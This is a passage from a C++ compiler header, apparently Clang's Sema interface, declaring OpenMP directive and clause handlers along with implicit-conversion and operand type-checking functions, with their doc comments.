ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for
/// simd' after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Checks correctness of linear modifiers.
bool CheckOpenMPLinearModifier(OpenMPLinearClauseKind LinKind,
SourceLocation LinLoc);
/// Checks that the specified declaration matches requirements for the linear
/// decls.
bool CheckOpenMPLinearDecl(const ValueDecl *D, SourceLocation ELoc,
OpenMPLinearClauseKind LinKind, QualType Type,
bool IsDeclareSimd = false);
/// Called on well-formed '\#pragma omp declare simd' after parsing of
/// the associated method/function.
DeclGroupPtrTy ActOnOpenMPDeclareSimdDirective(
DeclGroupPtrTy DG, OMPDeclareSimdDeclAttr::BranchStateTy BS,
Expr *Simdlen, ArrayRef<Expr *> Uniforms, ArrayRef<Expr *> Aligneds,
ArrayRef<Expr *> Alignments, ArrayRef<Expr *> Linears,
ArrayRef<unsigned> LinModifiers, ArrayRef<Expr *> Steps, SourceRange SR);
/// Checks '\#pragma omp declare variant' variant function and original
/// functions after parsing of the associated method/function.
/// \param DG Function declaration to which declare variant directive is
/// applied to.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \param TI The trait info object representing the match clause.
/// \returns None, if the function/variant function are not compatible with
/// the pragma, pair of original function/variant ref expression otherwise.
Optional<std::pair<FunctionDecl *, Expr *>>
checkOpenMPDeclareVariantFunction(DeclGroupPtrTy DG, Expr *VariantRef,
OMPTraitInfo &TI, SourceRange SR);
/// Called on well-formed '\#pragma omp declare variant' after parsing of
/// the associated method/function.
/// \param FD Function declaration to which declare variant directive is
/// applied to.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \param TI The context traits associated with the function variant.
void ActOnOpenMPDeclareVariantDirective(FunctionDecl *FD, Expr *VariantRef,
OMPTraitInfo &TI, SourceRange SR);
OMPClause *ActOnOpenMPSingleExprClause(OpenMPClauseKind Kind,
Expr *Expr,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocator' clause.
OMPClause *ActOnOpenMPAllocatorClause(Expr *Allocator,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'if' clause.
OMPClause *ActOnOpenMPIfClause(OpenMPDirectiveKind NameModifier,
Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation NameModifierLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'final' clause.
OMPClause *ActOnOpenMPFinalClause(Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_threads' clause.
OMPClause *ActOnOpenMPNumThreadsClause(Expr *NumThreads,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'safelen' clause.
OMPClause *ActOnOpenMPSafelenClause(Expr *Length,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simdlen' clause.
OMPClause *ActOnOpenMPSimdlenClause(Expr *Length, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'collapse' clause.
OMPClause *ActOnOpenMPCollapseClause(Expr *NumForLoops,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'ordered' clause.
OMPClause *
ActOnOpenMPOrderedClause(SourceLocation StartLoc, SourceLocation EndLoc,
SourceLocation LParenLoc = SourceLocation(),
Expr *NumForLoops = nullptr);
/// Called on well-formed 'grainsize' clause.
OMPClause *ActOnOpenMPGrainsizeClause(Expr *Size, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_tasks' clause.
OMPClause *ActOnOpenMPNumTasksClause(Expr *NumTasks, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'hint' clause.
OMPClause *ActOnOpenMPHintClause(Expr *Hint, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'detach' clause.
OMPClause *ActOnOpenMPDetachClause(Expr *Evt, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSimpleClause(OpenMPClauseKind Kind,
unsigned Argument,
SourceLocation ArgumentLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'default' clause.
OMPClause *ActOnOpenMPDefaultClause(llvm::omp::DefaultKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'proc_bind' clause.
OMPClause *ActOnOpenMPProcBindClause(llvm::omp::ProcBindKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'order' clause.
OMPClause *ActOnOpenMPOrderClause(OpenMPOrderClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(OpenMPDependClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSingleExprWithArgClause(
OpenMPClauseKind Kind, ArrayRef<unsigned> Arguments, Expr *Expr,
SourceLocation StartLoc, SourceLocation LParenLoc,
ArrayRef<SourceLocation> ArgumentsLoc, SourceLocation DelimLoc,
SourceLocation EndLoc);
/// Called on well-formed 'schedule' clause.
OMPClause *ActOnOpenMPScheduleClause(
OpenMPScheduleClauseModifier M1, OpenMPScheduleClauseModifier M2,
OpenMPScheduleClauseKind Kind, Expr *ChunkSize, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation M1Loc, SourceLocation M2Loc,
SourceLocation KindLoc, SourceLocation CommaLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPClause(OpenMPClauseKind Kind, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nowait' clause.
OMPClause *ActOnOpenMPNowaitClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'untied' clause.
OMPClause *ActOnOpenMPUntiedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'mergeable' clause.
OMPClause *ActOnOpenMPMergeableClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'read' clause.
OMPClause *ActOnOpenMPReadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'write' clause.
OMPClause *ActOnOpenMPWriteClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'capture' clause.
OMPClause *ActOnOpenMPCaptureClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'seq_cst' clause.
OMPClause *ActOnOpenMPSeqCstClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'acq_rel' clause.
OMPClause *ActOnOpenMPAcqRelClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'acquire' clause.
OMPClause *ActOnOpenMPAcquireClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'release' clause.
OMPClause *ActOnOpenMPReleaseClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'relaxed' clause.
OMPClause *ActOnOpenMPRelaxedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'destroy' clause.
OMPClause *ActOnOpenMPDestroyClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'threads' clause.
OMPClause *ActOnOpenMPThreadsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simd' clause.
OMPClause *ActOnOpenMPSIMDClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nogroup' clause.
OMPClause *ActOnOpenMPNogroupClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedAddressClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedSharedMemoryClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reverse_offload' clause.
OMPClause *ActOnOpenMPReverseOffloadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dynamic_allocators' clause.
OMPClause *ActOnOpenMPDynamicAllocatorsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'atomic_default_mem_order' clause.
OMPClause *ActOnOpenMPAtomicDefaultMemOrderClause(
OpenMPAtomicDefaultMemOrderClauseKind Kind, SourceLocation KindLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPVarListClause(
OpenMPClauseKind Kind, ArrayRef<Expr *> Vars, Expr *DepModOrTailExpr,
const OMPVarListLocTy &Locs, SourceLocation ColonLoc,
CXXScopeSpec &ReductionOrMapperIdScopeSpec,
DeclarationNameInfo &ReductionOrMapperId, int ExtraModifier,
ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc, bool IsMapTypeImplicit,
SourceLocation ExtraModifierLoc);
/// Called on well-formed 'inclusive' clause.
OMPClause *ActOnOpenMPInclusiveClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'exclusive' clause.
OMPClause *ActOnOpenMPExclusiveClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocate' clause.
OMPClause *
ActOnOpenMPAllocateClause(Expr *Allocator, ArrayRef<Expr *> VarList,
SourceLocation StartLoc, SourceLocation ColonLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'private' clause.
OMPClause *ActOnOpenMPPrivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'firstprivate' clause.
OMPClause *ActOnOpenMPFirstprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'lastprivate' clause.
OMPClause *ActOnOpenMPLastprivateClause(
ArrayRef<Expr *> VarList, OpenMPLastprivateModifier LPKind,
SourceLocation LPKindLoc, SourceLocation ColonLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'shared' clause.
OMPClause *ActOnOpenMPSharedClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reduction' clause.
OMPClause *ActOnOpenMPReductionClause(
ArrayRef<Expr *> VarList, OpenMPReductionClauseModifier Modifier,
SourceLocation StartLoc, SourceLocation LParenLoc,
SourceLocation ModifierLoc, SourceLocation ColonLoc,
SourceLocation EndLoc, CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'task_reduction' clause.
OMPClause *ActOnOpenMPTaskReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'in_reduction' clause.
OMPClause *ActOnOpenMPInReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'linear' clause.
OMPClause *
ActOnOpenMPLinearClause(ArrayRef<Expr *> VarList, Expr *Step,
SourceLocation StartLoc, SourceLocation LParenLoc,
OpenMPLinearClauseKind LinKind, SourceLocation LinLoc,
SourceLocation ColonLoc, SourceLocation EndLoc);
/// Called on well-formed 'aligned' clause.
OMPClause *ActOnOpenMPAlignedClause(ArrayRef<Expr *> VarList,
Expr *Alignment,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyin' clause.
OMPClause *ActOnOpenMPCopyinClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyprivate' clause.
OMPClause *ActOnOpenMPCopyprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'flush' pseudo clause.
OMPClause *ActOnOpenMPFlushClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depobj' pseudo clause.
OMPClause *ActOnOpenMPDepobjClause(Expr *Depobj, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depend' clause.
OMPClause *
ActOnOpenMPDependClause(Expr *DepModifier, OpenMPDependClauseKind DepKind,
SourceLocation DepLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'device' clause.
OMPClause *ActOnOpenMPDeviceClause(OpenMPDeviceClauseModifier Modifier,
Expr *Device, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ModifierLoc,
SourceLocation EndLoc);
/// Called on well-formed 'map' clause.
OMPClause *
ActOnOpenMPMapClause(ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc,
CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
OpenMPMapClauseKind MapType, bool IsMapTypeImplicit,
SourceLocation MapLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'num_teams' clause.
OMPClause *ActOnOpenMPNumTeamsClause(Expr *NumTeams, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'thread_limit' clause.
OMPClause *ActOnOpenMPThreadLimitClause(Expr *ThreadLimit,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'priority' clause.
OMPClause *ActOnOpenMPPriorityClause(Expr *Priority, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dist_schedule' clause.
OMPClause *ActOnOpenMPDistScheduleClause(
OpenMPDistScheduleClauseKind Kind, Expr *ChunkSize,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation KindLoc,
SourceLocation CommaLoc, SourceLocation EndLoc);
/// Called on well-formed 'defaultmap' clause.
OMPClause *ActOnOpenMPDefaultmapClause(
OpenMPDefaultmapClauseModifier M, OpenMPDefaultmapClauseKind Kind,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation MLoc,
SourceLocation KindLoc, SourceLocation EndLoc);
/// Called on well-formed 'to' clause.
OMPClause *
ActOnOpenMPToClause(ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'from' clause.
OMPClause *ActOnOpenMPFromClause(
ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'use_device_ptr' clause.
OMPClause *ActOnOpenMPUseDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'is_device_ptr' clause.
OMPClause *ActOnOpenMPIsDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'nontemporal' clause.
OMPClause *ActOnOpenMPNontemporalClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// The kind of conversion being performed.
enum CheckedConversionKind {
/// An implicit conversion.
CCK_ImplicitConversion,
/// A C-style cast.
CCK_CStyleCast,
/// A functional-style cast.
CCK_FunctionalCast,
/// A cast other than a C-style cast.
CCK_OtherCast,
/// A conversion for an operand of a builtin overloaded operator.
CCK_ForBuiltinOverloadedOp
};
static bool isCast(CheckedConversionKind CCK) {
return CCK == CCK_CStyleCast || CCK == CCK_FunctionalCast ||
CCK == CCK_OtherCast;
}
/// ImpCastExprToType - If Expr is not of type 'Type', insert an implicit
/// cast. If there is already an implicit cast, merge into the existing one.
/// If isLvalue, the result of the cast is an lvalue.
ExprResult ImpCastExprToType(Expr *E, QualType Type, CastKind CK,
ExprValueKind VK = VK_RValue,
const CXXCastPath *BasePath = nullptr,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
/// ScalarTypeToBooleanCastKind - Returns the cast kind corresponding
/// to the conversion from scalar type ScalarTy to the Boolean type.
static CastKind ScalarTypeToBooleanCastKind(QualType ScalarTy);
/// IgnoredValueConversions - Given that an expression's result is
/// syntactically ignored, perform any conversions that are
/// required.
ExprResult IgnoredValueConversions(Expr *E);
// UsualUnaryConversions - promotes integers (C99 6.3.1.1p2) and converts
// functions and arrays to their respective pointers (C99 6.3.2.1).
ExprResult UsualUnaryConversions(Expr *E);
/// CallExprUnaryConversions - a special case of an unary conversion
/// performed on a function designator of a call expression.
ExprResult CallExprUnaryConversions(Expr *E);
// DefaultFunctionArrayConversion - converts functions and arrays
// to their respective pointers (C99 6.3.2.1).
ExprResult DefaultFunctionArrayConversion(Expr *E, bool Diagnose = true);
// DefaultFunctionArrayLvalueConversion - converts functions and
// arrays to their respective pointers and performs the
// lvalue-to-rvalue conversion.
ExprResult DefaultFunctionArrayLvalueConversion(Expr *E,
bool Diagnose = true);
// DefaultLvalueConversion - performs lvalue-to-rvalue conversion on
// the operand. This is DefaultFunctionArrayLvalueConversion,
// except that it assumes the operand isn't of function or array
// type.
ExprResult DefaultLvalueConversion(Expr *E);
// DefaultArgumentPromotion (C99 6.5.2.2p6). Used for function calls that
// do not have a prototype. Integer promotions are performed on each
// argument, and arguments that have type float are promoted to double.
ExprResult DefaultArgumentPromotion(Expr *E);
/// If \p E is a prvalue denoting an unmaterialized temporary, materialize
/// it as an xvalue. In C++98, the result will still be a prvalue, because
/// we don't have xvalues there.
ExprResult TemporaryMaterializationConversion(Expr *E);
// Used for emitting the right warning by DefaultVariadicArgumentPromotion
enum VariadicCallType {
VariadicFunction,
VariadicBlock,
VariadicMethod,
VariadicConstructor,
VariadicDoesNotApply
};
VariadicCallType getVariadicCallType(FunctionDecl *FDecl,
const FunctionProtoType *Proto,
Expr *Fn);
// Used for determining in which context a type is allowed to be passed to a
// vararg function.
enum VarArgKind {
VAK_Valid,
VAK_ValidInCXX11,
VAK_Undefined,
VAK_MSVCUndefined,
VAK_Invalid
};
// Determines which VarArgKind fits an expression.
VarArgKind isValidVarArgType(const QualType &Ty);
/// Check to see if the given expression is a valid argument to a variadic
/// function, issuing a diagnostic if not.
void checkVariadicArgument(const Expr *E, VariadicCallType CT);
/// Check to see if a given expression could have '.c_str()' called on it.
bool hasCStrMethod(const Expr *E);
/// GatherArgumentsForCall - Collector argument expressions for various
/// form of call prototypes.
bool GatherArgumentsForCall(SourceLocation CallLoc, FunctionDecl *FDecl,
const FunctionProtoType *Proto,
unsigned FirstParam, ArrayRef<Expr *> Args,
SmallVectorImpl<Expr *> &AllArgs,
VariadicCallType CallType = VariadicDoesNotApply,
bool AllowExplicit = false,
bool IsListInitialization = false);
// DefaultVariadicArgumentPromotion - Like DefaultArgumentPromotion, but
// will create a runtime trap if the resulting type is not a POD type.
ExprResult DefaultVariadicArgumentPromotion(Expr *E, VariadicCallType CT,
FunctionDecl *FDecl);
/// Context in which we're performing a usual arithmetic conversion.
enum ArithConvKind {
/// An arithmetic operation.
ACK_Arithmetic,
/// A bitwise operation.
ACK_BitwiseOp,
/// A comparison.
ACK_Comparison,
/// A conditional (?:) operator.
ACK_Conditional,
/// A compound assignment expression.
ACK_CompAssign,
};
// UsualArithmeticConversions - performs the UsualUnaryConversions on it's
// operands and then handles various conversions that are common to binary
// operators (C99 6.3.1.8). If both operands aren't arithmetic, this
// routine returns the first non-arithmetic type found. The client is
// responsible for emitting appropriate error diagnostics.
QualType UsualArithmeticConversions(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, ArithConvKind ACK);
/// AssignConvertType - All of the 'assignment' semantic checks return this
/// enum to indicate whether the assignment was allowed. These checks are
/// done for simple assignments, as well as initialization, return from
/// function, argument passing, etc. The query is phrased in terms of a
/// source and destination type.
enum AssignConvertType {
/// Compatible - the types are compatible according to the standard.
Compatible,
/// PointerToInt - The assignment converts a pointer to an int, which we
/// accept as an extension.
PointerToInt,
/// IntToPointer - The assignment converts an int to a pointer, which we
/// accept as an extension.
IntToPointer,
/// FunctionVoidPointer - The assignment is between a function pointer and
/// void*, which the standard doesn't allow, but we accept as an extension.
FunctionVoidPointer,
/// IncompatiblePointer - The assignment is between two pointers types that
/// are not compatible, but we accept them as an extension.
IncompatiblePointer,
/// IncompatibleFunctionPointer - The assignment is between two function
/// pointers types that are not compatible, but we accept them as an
/// extension.
IncompatibleFunctionPointer,
/// IncompatiblePointerSign - The assignment is between two pointers types
/// which point to integers which have a different sign, but are otherwise
/// identical. This is a subset of the above, but broken out because it's by
/// far the most common case of incompatible pointers.
IncompatiblePointerSign,
/// CompatiblePointerDiscardsQualifiers - The assignment discards
/// c/v/r qualifiers, which we accept as an extension.
CompatiblePointerDiscardsQualifiers,
/// IncompatiblePointerDiscardsQualifiers - The assignment
/// discards qualifiers that we don't permit to be discarded,
/// like address spaces.
IncompatiblePointerDiscardsQualifiers,
/// IncompatibleNestedPointerAddressSpaceMismatch - The assignment
/// changes address spaces in nested pointer types which is not allowed.
/// For instance, converting __private int ** to __generic int ** is
/// illegal even though __private could be converted to __generic.
IncompatibleNestedPointerAddressSpaceMismatch,
/// IncompatibleNestedPointerQualifiers - The assignment is between two
/// nested pointer types, and the qualifiers other than the first two
/// levels differ e.g. char ** -> const char **, but we accept them as an
/// extension.
IncompatibleNestedPointerQualifiers,
/// IncompatibleVectors - The assignment is between two vector types that
/// have the same size, which we accept as an extension.
IncompatibleVectors,
/// IntToBlockPointer - The assignment converts an int to a block
/// pointer. We disallow this.
IntToBlockPointer,
/// IncompatibleBlockPointer - The assignment is between two block
/// pointers types that are not compatible.
IncompatibleBlockPointer,
/// IncompatibleObjCQualifiedId - The assignment is between a qualified
/// id type and something else (that is incompatible with it). For example,
/// "id <XXX>" = "Foo *", where "Foo *" doesn't implement the XXX protocol.
IncompatibleObjCQualifiedId,
/// IncompatibleObjCWeakRef - Assigning a weak-unavailable object to an
/// object with __weak qualifier.
IncompatibleObjCWeakRef,
/// Incompatible - We reject this conversion outright, it is invalid to
/// represent it in the AST.
Incompatible
};
/// DiagnoseAssignmentResult - Emit a diagnostic, if required, for the
/// assignment conversion type specified by ConvTy. This returns true if the
/// conversion was invalid or false if the conversion was accepted.
bool DiagnoseAssignmentResult(AssignConvertType ConvTy,
SourceLocation Loc,
QualType DstType, QualType SrcType,
Expr *SrcExpr, AssignmentAction Action,
bool *Complained = nullptr);
/// IsValueInFlagEnum - Determine if a value is allowed as part of a flag
/// enum. If AllowMask is true, then we also allow the complement of a valid
/// value, to be used as a mask.
bool IsValueInFlagEnum(const EnumDecl *ED, const llvm::APInt &Val,
bool AllowMask) const;
/// DiagnoseAssignmentEnum - Warn if assignment to enum is a constant
/// integer not in the range of enum values.
void DiagnoseAssignmentEnum(QualType DstType, QualType SrcType,
Expr *SrcExpr);
/// CheckAssignmentConstraints - Perform type checking for assignment,
/// argument passing, variable initialization, and function return values.
/// C99 6.5.16.
AssignConvertType CheckAssignmentConstraints(SourceLocation Loc,
QualType LHSType,
QualType RHSType);
/// Check assignment constraints and optionally prepare for a conversion of
/// the RHS to the LHS type. The conversion is prepared for if ConvertRHS
/// is true.
AssignConvertType CheckAssignmentConstraints(QualType LHSType,
ExprResult &RHS,
CastKind &Kind,
bool ConvertRHS = true);
/// Check assignment constraints for an assignment of RHS to LHSType.
///
/// \param LHSType The destination type for the assignment.
/// \param RHS The source expression for the assignment.
/// \param Diagnose If \c true, diagnostics may be produced when checking
/// for assignability. If a diagnostic is produced, \p RHS will be
/// set to ExprError(). Note that this function may still return
/// without producing a diagnostic, even for an invalid assignment.
/// \param DiagnoseCFAudited If \c true, the target is a function parameter
/// in an audited Core Foundation API and does not need to be checked
/// for ARC retain issues.
/// \param ConvertRHS If \c true, \p RHS will be updated to model the
/// conversions necessary to perform the assignment. If \c false,
/// \p Diagnose must also be \c false.
AssignConvertType CheckSingleAssignmentConstraints(
QualType LHSType, ExprResult &RHS, bool Diagnose = true,
bool DiagnoseCFAudited = false, bool ConvertRHS = true);
// If the lhs type is a transparent union, check whether we
// can initialize the transparent union with the given expression.
AssignConvertType CheckTransparentUnionArgumentConstraints(QualType ArgType,
ExprResult &RHS);
bool IsStringLiteralToNonConstPointerConversion(Expr *From, QualType ToType);
bool CheckExceptionSpecCompatibility(Expr *From, QualType ToType);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit = false);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit,
ImplicitConversionSequence& ICS);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const ImplicitConversionSequence& ICS,
AssignmentAction Action,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const StandardConversionSequence& SCS,
AssignmentAction Action,
CheckedConversionKind CCK);
ExprResult PerformQualificationConversion(
Expr *E, QualType Ty, ExprValueKind VK = VK_RValue,
CheckedConversionKind CCK = CCK_ImplicitConversion);
/// the following "Check" methods will return a valid/converted QualType
/// or a null QualType (indicating an error diagnostic was issued).
/// type checking binary operators (subroutines of CreateBuiltinBinOp).
QualType InvalidOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType InvalidLogicalVectorOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType CheckPointerToMemberOperands( // C++ 5.5
ExprResult &LHS, ExprResult &RHS, ExprValueKind &VK,
SourceLocation OpLoc, bool isIndirect);
QualType CheckMultiplyDivideOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc, bool IsCompAssign,
bool IsDivide);
QualType CheckRemainderOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
bool IsCompAssign = false);
QualType CheckAdditionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, QualType* CompLHSTy = nullptr);
QualType CheckSubtractionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
QualType* CompLHSTy = nullptr);
QualType CheckShiftOperands( // C99 6.5.7
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, bool IsCompAssign = false);
void CheckPtrComparisonWithNullChar(ExprResult &E, ExprResult &NullE);
QualType CheckCompareOperands( // C99 6.5.8/9
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckBitwiseOperands( // C99 6.5.[10...12]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckLogicalOperands( // C99 6.5.[13,14]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
// CheckAssignmentOperands is used for both simple and compound assignment.
// For simple assignment, pass both expressions and a null converted type.
// For compound assignment, pass both expressions and the converted type.
QualType CheckAssignmentOperands( // C99 6.5.16.[1,2]
